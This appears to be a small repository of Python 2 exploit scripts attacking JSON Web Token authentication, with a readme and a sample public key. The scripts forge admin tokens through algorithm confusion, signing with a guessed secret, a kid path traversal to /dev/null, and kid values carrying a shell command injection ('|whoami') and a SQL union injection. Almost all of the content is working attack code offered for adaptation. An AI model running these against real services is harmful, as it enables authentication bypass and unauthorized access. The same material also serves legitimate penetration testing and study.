├── README.md
└── jwt-payloads
    ├── jwt_alg_confusion_exploit.py
    ├── jwt_hmac_sign_secret.py
    ├── jwt_kid_cmdinj_exploit.py
    ├── jwt_kid_sig_bypass_exploit.py
    ├── jwt_kid_sqli_exploit.py
    ├── public.pem
    └── readme.md


/README.md:
--------------------------------------------------------------------------------
1 | # Exploits
2 | 
3 | ➢ Repo for exploit scripts.
4 | 


--------------------------------------------------------------------------------
/jwt-payloads/jwt_alg_confusion_exploit.py:
--------------------------------------------------------------------------------
 1 | import hmac
 2 | import base64
 3 | import hashlib
 4 | 
 5 | file = open("public.pem")
 6 | key = file.read() #storing public key as secret
 7 | #modified header("alg":"hs256") and payload
 8 | str= "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vYXR0YWNrLnNqb2VyZGxhbmdrZW1wZXIubmwvIiwiaWF0IjoxNjQ1NzgzNzYxLCJleHAiOjE2NDU3ODQ5NjEsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCBhZG1pbiJ9fQ"   
 9 | sign = base64.urlsafe_b64encode(hmac.new(key,str,hashlib.sha256).digest()).decode('UTF-8').rstrip("=")
10 | jwt_token=str+"."+sign
11 | print "jwt_token has been generated:\n"+ jwt_token
12 | 


--------------------------------------------------------------------------------
/jwt-payloads/jwt_hmac_sign_secret.py:
--------------------------------------------------------------------------------
 1 | import base64
 2 | import json
 3 | import hmac
 4 | import hashlib
 5 | 
 6 | #script for signing a JWT token with a brute-forced secret key
 7 | 
 8 | #modify header and payload as you need
 9 | 
10 | header= {"typ": "JWT","alg": "HS256"}
11 | 
12 | payload = {"user": "admin"}
13 | 
14 | #secret key use for signing with hmac
15 | 
16 | key="your_key"
17 | 
18 | b64_hp=base64.urlsafe_b64encode(json.dumps(header)).rstrip("=")+"."+base64.urlsafe_b64encode(json.dumps(payload)).rstrip("=")
19 | 
20 | # jwt signature - > HMACSHA256(  base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)
21 | 
22 | #hmacsha256->HMAC(key, msg, digest).digest()
23 | 
24 | signature=base64.urlsafe_b64encode(hmac.new(key,b64_hp,hashlib.sha256).digest()).decode('utf8').rstrip("=")
25 | 
26 | print '\nEncoded header and payload:'+b64_hp
27 | print '\nSignature:'+signature
28 | 
29 | jwt_token=b64_hp+"."+signature
30 | 
31 | print '\nJwt token has been generated:' +jwt_token
32 | 
33 | 
34 | 
35 | 
36 | 


--------------------------------------------------------------------------------
/jwt-payloads/jwt_kid_cmdinj_exploit.py:
--------------------------------------------------------------------------------
 1 | import hmac
 2 | import base64
 3 | import hashlib
 4 | import json
 5 | 
 6 | header={"typ":"JWT","alg":"HS256","kid":"|whoami"}
 7 | payload={"user":"user"}
 8 | key ="key"
 9 | 
10 | str=base64.urlsafe_b64encode(json.dumps(header)).rstrip("=")+"."+base64.urlsafe_b64encode(json.dumps(payload)).rstrip("=")
11 | 
12 | sig=base64.urlsafe_b64encode(hmac.new(key,str,hashlib.sha256).digest()).decode('utf8').rstrip("=") 
13 | 
14 | jwt_token=str+"."+sig
15 | 
16 | print "jwt_token has been generated:\n"+ jwt_token
17 | 
18 | 
19 | 
20 | 


--------------------------------------------------------------------------------
/jwt-payloads/jwt_kid_sig_bypass_exploit.py:
--------------------------------------------------------------------------------
 1 | import hmac
 2 | import base64
 3 | import hashlib
 4 | import json
 5 | 
 6 | header={"typ":"JWT","alg":"HS256","kid":"../../dev/null"}
 7 | #/dev/null returns nothing
 8 | #you can also try, "kid":"/proc/sys/kernel/randomize_va_space" with key=2
 9 | 
10 | payload={"user":"admin"}
11 | key =""
12 | 
13 | 
14 | #saving modified header and payload
15 | str=base64.urlsafe_b64encode(json.dumps(header)).rstrip("=")+"."+base64.urlsafe_b64encode(json.dumps(payload)).rstrip("=")
16 | 
17 | #generating signature using hs256
18 | sig=base64.urlsafe_b64encode(hmac.new(key,str,hashlib.sha256).digest()).decode('utf8').rstrip("=") 
19 | 
20 | jwt_token=str+"."+sig
21 | 
22 | #print str+"."+sig
23 | 
24 | print "jwt_token has been generated:\n"+ jwt_token
25 | 


--------------------------------------------------------------------------------
/jwt-payloads/jwt_kid_sqli_exploit.py:
--------------------------------------------------------------------------------
 1 | import hmac
 2 | import base64
 3 | import hashlib
 4 | import json
 5 | 
 6 | #add your sqli paylod in the kid 
 7 | header={"typ":"JWT","alg":"HS256","kid":"aaa' union select 'test"}
 8 | #select key from keys where kid='aaa' union select 'test' 
 9 | payload={"user":"admin"}
10 | key ="test"
11 | 
12 | str=base64.urlsafe_b64encode(json.dumps(header)).rstrip("=")+"."+base64.urlsafe_b64encode(json.dumps(payload)).rstrip("=")
13 | 
14 | sig=base64.urlsafe_b64encode(hmac.new(key,str,hashlib.sha256).digest()).decode('utf8').rstrip("=") 
15 | 
16 | jwt_token=str+"."+sig
17 | 
18 | #print str+"."+sig
19 | 
20 | print "jwt_token has been generated:\n"+ jwt_token
21 | 
22 | 
23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/jwt-payloads/public.pem:
--------------------------------------------------------------------------------
 1 | -----BEGIN PUBLIC KEY-----
 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqi8TnuQBGXOGx/Lfn4JF
 3 | NYOH2V1qemfs83stWc1ZBQFCQAZmUr/sgbPypYzy229pFl6bGeqpiRHrSufHug7c
 4 | 1LCyalyUEP+OzeqbEhSSuUss/XyfzybIusbqIDEQJ+Yex3CdgwC/hAF3xptV/2t+
 5 | H6y0Gdh1weVKRM8+QaeWUxMGOgzJYAlUcRAP5dRkEOUtSKHBFOFhEwNBXrfLd76f
 6 | ZXPNgyN0TzNLQjPQOy/tJ/VFq8CQGE4/K5ElRSDlj4kswxonWXYAUVxnqRN1LGHw
 7 | 2G5QRE2D13sKHCC8ZrZXJzj67Hrq5h2SADKzVzhA8AW3WZlPLrlFT3t1+iZ6m+aF
 8 | KwIDAQAB
 9 | -----END PUBLIC KEY-----
10 | 


--------------------------------------------------------------------------------
/jwt-payloads/readme.md:
--------------------------------------------------------------------------------
 1 | ## JWT Exploit Scripts
 2 | 
 3 |  ![python](https://img.shields.io/badge/Python-2.x.x-blue) ![Tested](https://img.shields.io/badge/Tested%20On-Ubuntu%2018.04-green)
 4 |  [![Linkedin](https://img.shields.io/badge/Linkedin-/Sahadmk-blue)](https://www.linkedin.com/in/sahadmk) [![Medium](https://img.shields.io/badge/Medium-%40sahadmk-black)](https://medium.com/@sahadmk)
 5 |  
 6 |  
 7 |  Python scripts for exploiting various JWT security issues. You can make changes in the exploit scripts as per you need. 
 8 |  
 9 | 
10 | ## Exploits
11 |     
12 |           • JWT Hmac signing with a secret key
13 |           
14 |           • JWT Algorithm Confusion 
15 |           
16 |           • JWT kid File Traversal - Signature bypass
17 |                                                          
18 |           • JWT kid Command Injection (cve-2017-17405) 
19 |           
20 |           • JWT kid SQL Injection
21 |           
22 | ## Usage
23 |           ➢ python2 <exploit_script.py>
24 |                     
25 |    Examples:
26 |                                                                                                                                              
27 |           • python2 jwt_alg_confusion_exploit.py
28 |               
29 |           • python2 jwt_kid_sig_bypass_exploit.py
30 |                                                          
31 |                      
32 |           
33 |  
34 | 


--------------------------------------------------------------------------------